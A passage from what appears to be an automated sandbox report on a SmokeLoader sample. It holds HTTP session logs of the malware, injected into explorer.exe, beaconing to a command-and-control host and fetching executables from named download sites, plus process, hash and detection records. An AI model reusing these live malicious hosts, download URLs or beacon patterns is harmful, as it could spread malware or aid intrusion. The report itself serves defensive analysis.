                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://pebbfc.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 131
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:56:06.542974949 CET | 10832 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:56:06 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  16 | 192.168.2.4 | 49858 | 47.251.11.252 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 28, 2021 13:56:06.744535923 CET | 10833 | OUT | POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://xkoocu.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 359
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:56:07.296400070 CET | 10833 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:56:07 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 2eI:82OO~kEKg2P0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  17 | 192.168.2.4 | 49859 | 54.38.220.85 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 28, 2021 13:56:07.346076012 CET | 10834 | OUT | GET /install5.exe HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Host: unicupload.top
                  Dec 28, 2021 13:56:07.363667965 CET | 10835 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.14.0 (Ubuntu)
                  Date: Tue, 28 Dec 2021 12:55:13 GMT
                  Content-Type: text/html
                  Content-Length: 178
                  Connection: keep-alive
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  18 | 192.168.2.4 | 49860 | 47.251.11.252 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 28, 2021 13:56:07.569057941 CET | 10835 | OUT | POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://xpkuvjioi.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 144
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:56:08.121371984 CET | 10836 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:56:07 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 0
                  Connection: close


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  19 | 192.168.2.4 | 49861 | 47.251.11.252 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 28, 2021 13:56:08.681101084 CET | 10837 | OUT | POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://nxjfh.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 239
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:56:09.237057924 CET | 10837 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:56:09 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 0
                  Connection: close


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  2 | 192.168.2.4 | 49788 | 47.251.11.252 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 28, 2021 13:54:50.273237944 CET | 1546 | OUT | POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://oabgiwp.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 245
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:54:50.826272011 CET | 1547 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:50 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  20 | 192.168.2.4 | 49862 | 47.251.11.252 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 28, 2021 13:56:09.457644939 CET | 10838 | OUT | POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://ithwflphmf.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 167
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:56:10.024442911 CET | 10839 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:56:09 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 33 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c8 89 40 0e 65 1b e4 bf c1 b1 a2 14 a5 08 cd 2c b4 59 52 db 17 f8 ee 39 ec 3f 52 17 b2 ea 93 42 fe 02 86 1c 80 a7 70 9b 77 a7 f9 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 3eI:82O@e,YR9?RBpw0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  3 | 192.168.2.4 | 49790 | 47.251.11.252 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 28, 2021 13:54:51.034786940 CET | 1548 | OUT | POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://hwrkvn.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 291
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:54:51.603113890 CET | 1549 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:51 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  4 | 192.168.2.4 | 49791 | 47.251.11.252 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 28, 2021 13:54:51.806477070 CET | 1550 | OUT | POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://oskoy.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 206
                  Host: host-data-coin-11.com
                  Timestamp:Dec 28, 2021 13:54:52.354857922 CET
                  kBytes transferred:1551
                  Direction:IN
                  Data:HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:52 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                  Session ID:5
                  Source IP:192.168.2.4
                  Source Port:49792
                  Destination IP:47.251.11.252
                  Destination Port:80
                  Process:C:\Windows\explorer.exe
                  Timestamp:Dec 28, 2021 13:54:52.559643030 CET
                  kBytes transferred:1552
                  Direction:OUT
                  Data:POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://yhvtxw.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 201
                  Host: host-data-coin-11.com
                  Timestamp:Dec 28, 2021 13:54:53.118556976 CET
                  kBytes transferred:1552
                  Direction:IN
                  Data:HTTP/1.1 200 OK
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:52 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 0
                  Connection: close


                  Session ID:6
                  Source IP:192.168.2.4
                  Source Port:49793
                  Destination IP:47.251.11.252
                  Destination Port:80
                  Process:C:\Windows\explorer.exe
                  Timestamp:Dec 28, 2021 13:54:53.624316931 CET
                  kBytes transferred:1553
                  Direction:OUT
                  Data:POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://kfdyfm.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 233
                  Host: host-data-coin-11.com
                  Timestamp:Dec 28, 2021 13:54:54.195750952 CET
                  kBytes transferred:1554
                  Direction:IN
                  Data:HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:54 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 2dI:82OI:J_J-WS,/0


                  Session ID:7
                  Source IP:192.168.2.4
                  Source Port:49795
                  Destination IP:47.251.11.252
                  Destination Port:80
                  Process:C:\Windows\explorer.exe
                  Timestamp:Dec 28, 2021 13:54:55.598448038 CET
                  kBytes transferred:1555
                  Direction:OUT
                  Data:POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://jealulibe.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 145
                  Host: host-data-coin-11.com
                  Timestamp:Dec 28, 2021 13:54:56.155267954 CET
                  kBytes transferred:1556
                  Direction:IN
                  Data:HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:55 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                  Session ID:8
                  Source IP:192.168.2.4
                  Source Port:49796
                  Destination IP:47.251.11.252
                  Destination Port:80
                  Process:C:\Windows\explorer.exe
                  Timestamp:Dec 28, 2021 13:54:56.359143019 CET
                  kBytes transferred:1557
                  Direction:OUT
                  Data:POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://axnxlm.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 318
                  Host: host-data-coin-11.com
                  Timestamp:Dec 28, 2021 13:54:56.915194988 CET
                  kBytes transferred:1558
                  Direction:IN
                  Data:HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:56 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef ae 8a 70 bc 57 dd 42 d6 f7 23 8c 21 e6 c3 93 50 2c e2 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 46I:82OR&:UPJ%9KpWB#!P,c0


                  Session ID:9
                  Source IP:192.168.2.4
                  Source Port:49797
                  Destination IP:47.251.11.252
                  Destination Port:80
                  Process:C:\Windows\explorer.exe
                  Timestamp:Dec 28, 2021 13:54:57.251928091 CET
                  kBytes transferred:1558
                  Direction:OUT
                  Data:GET /files/5376_1640094939_1074.exe HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Host: data-host-coin-8.com
                  Timestamp:Dec 28, 2021 13:54:57.802864075 CET
                  kBytes transferred:1559
                  Direction:IN
                  Data:HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:57 GMT
                  Content-Type: text/html; charset=iso-8859-1
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Ascii: 11a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at data-host-coin-8.com Port 80</address></body></html>0


                  Code Manipulations

                  Statistics

                  Behavior


                  System Behavior

                  General

                  Start time:13:54:05
                  Start date:28/12/2021
                  Path:C:\Users\user\Desktop\UZ6FEqlix4.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\UZ6FEqlix4.exe"
                  Imagebase:0x400000
                  File size:339456 bytes
                  MD5 hash:5E0ED8966761E70EE0B8DCD141AAFB4C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:13:54:07
                  Start date:28/12/2021
                  Path:C:\Users\user\Desktop\UZ6FEqlix4.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\UZ6FEqlix4.exe"
                  Imagebase:0x400000
                  File size:339456 bytes
                  MD5 hash:5E0ED8966761E70EE0B8DCD141AAFB4C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, Author: Joe Security
                  Reputation:low

                  General

                  Start time:13:54:13
                  Start date:28/12/2021
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff6fee60000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Start time:13:54:47
                  Start date:28/12/2021
                  Path:C:\Users\user\AppData\Roaming\eveggtb
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\eveggtb
                  Imagebase:0x400000
                  File size:339456 bytes
                  MD5 hash:5E0ED8966761E70EE0B8DCD141AAFB4C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 20%, Metadefender, Browse
                  • Detection: 67%, ReversingLabs
                  Reputation:low

                  General

                  Start time:13:54:49
                  Start date:28/12/2021
                  Path:C:\Users\user\AppData\Roaming\eveggtb
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\eveggtb
                  Imagebase:0x400000
                  File size:339456 bytes
                  MD5 hash:5E0ED8966761E70EE0B8DCD141AAFB4C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  General

                  Start time:13:56:03
                  Start date:28/12/2021
                  Path:C:\Users\user\AppData\Local\Temp\411F.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\411F.exe
                  Imagebase:0x400000
                  File size:339456 bytes
                  MD5 hash:5E0ED8966761E70EE0B8DCD141AAFB4C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:13:56:06
                  Start date:28/12/2021
                  Path:C:\Users\user\AppData\Local\Temp\411F.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\411F.exe
                  Imagebase:0x400000
                  File size:339456 bytes
                  MD5 hash:5E0ED8966761E70EE0B8DCD141AAFB4C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Disassembly

                  Code Analysis
